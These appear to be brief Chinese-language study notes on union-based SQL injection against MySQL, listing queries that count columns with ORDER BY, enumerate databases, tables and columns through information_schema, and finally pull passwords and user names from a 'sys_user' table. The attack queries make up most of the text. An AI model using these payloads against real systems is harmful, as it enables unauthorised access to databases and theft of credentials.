所谓的sql注入本质上还是执行sql语句
检测注入点
判断是否存在sql注入可能
判断当前表有多少字段
利用order by n
select * from tag order by 2;
order by n以第n个column排序,如果n大于表中字段个数会报错。
爆库
SELECT * FROM `tag` where id = 3 union select 1,database();
查询information_schema数据库的schemata表,存放着所有mysql所有数据库名称
select schema_name from information_schema.schemata
爆表
SELECT * FROM `tag` where id = 3 union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()
SELECT table_name FROM `TABLES` where table_schema = 'elementary'
爆字段
select column_name from COLUMNS where table_name = 'sys_user'
select column_name from COLUMNS where table_name = 'sys_user' and table_schema = 'elementary'
爆值
SELECT * FROM `tag` where id = 3 UNION SELECT `password`,user_name from sys_user